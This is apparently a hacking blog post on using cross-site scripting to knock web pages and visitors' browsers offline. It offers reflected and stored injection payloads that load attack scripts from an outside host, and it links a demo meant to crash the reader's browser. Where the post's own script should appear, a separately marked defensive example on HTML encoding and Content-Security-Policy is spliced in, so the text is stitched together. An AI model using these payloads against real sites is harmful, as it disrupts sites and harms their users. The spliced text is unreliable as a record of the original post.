DoSing Sites & All Browsers With XSS.


Today I want to show you some simple cross-site scripting DoSing. Normal and historical server DoS and DDoS attacks were done with hijacked computers attacking a website. Strictly speaking, a DDoS attack results in the server becoming unresponsive, but the actual result is that people can't view the page anymore. We can mimic this with cross-site scripting fairly easily. This again shows that cross-site scripting really needs to be taken seriously: it is a high danger in many situations and the possibilities are endless.

The script that we use does two things: it shuts down access to the webpage, and it DoSes the user's browser. This exploit affects fully patched versions of:

- Firefox
- Opera
- Internet Explorer

With XSS we can perform:

- Reflective, non-persistent DoS attack (limited results).
- Stored, persistent DoS attack.

If this script is reflective, we can send users a link to the page like this one, which could contain some JavaScript:

http://[site]/[page].php?vul="><iframe src="http://www.0x000000.com/hacks/pow.html"></iframe>

If it is stored (much better), we can do the same by inserting this script into the webpage itself:

<script src="http://www.0x000000.com/hacks/pow.js"></script>

This could DoS a full webpage if the data is shown on the index, or on any other page, and with it we mimic the denial of service behavior.

Demo: http://www.0x000000.com/hacks/exp_dos.html (should DoS your browser)

The script used for stored XSS:


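The defensive side of the two injection points described above, as an added example that is not the post's script or code from its author: the same two strings rendered without and with output encoding, plus a Content-Security-Policy that refuses the external iframe and script loads. The page template, the function names and the `https://example.test` origin are assumptions made for the illustration.

```javascript
// Added example. Sample inputs are the two strings quoted in the post.
const REFLECTED = '"><iframe src="http://www.0x000000.com/hacks/pow.html"></iframe>';
const STORED = '<script src="http://www.0x000000.com/hacks/pow.js"></script>';

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Hypothetical template: the value lands in a quoted attribute and in text.
// harden=false is the vulnerable 'before', harden=true the fixed 'after'.
function render(value, harden) {
  const v = harden ? escapeHtml(value) : value;
  return `<input name="q" value="${v}"><p>${v}</p>`;
}

// Crude scan for elements the untrusted value managed to create.
function injectedTags(html) {
  return (html.match(/<(iframe|script)\b/gi) || []).length;
}

// Second layer: only same-origin scripts and frames may load, so an external
// script or iframe is refused even where encoding was missed.
const CSP = "default-src 'self'; script-src 'self'; frame-src 'self'; object-src 'none'";

// Minimal evaluator for 'self' and exact-origin sources (not a full CSP parser).
function cspAllows(policy, directive, url, selfOrigin) {
  const directives = Object.fromEntries(
    policy.split(';').map((d) => d.trim().split(/\s+/)).filter((p) => p[0])
      .map(([name, ...sources]) => [name, sources]));
  const sources = directives[directive] || directives['default-src'] || [];
  const origin = new URL(url, selfOrigin).origin;
  return sources.some((s) => (s === "'self'" && origin === selfOrigin) || s === origin);
}

for (const [label, payload] of [['reflected', REFLECTED], ['stored', STORED]]) {
  console.log(label, 'unencoded tags:', injectedTags(render(payload, false)),
    'encoded tags:', injectedTags(render(payload, true)));
}
```

The policy only blocks the external loads used in the post's two examples; script injected inline still has to be stopped by the encoding step.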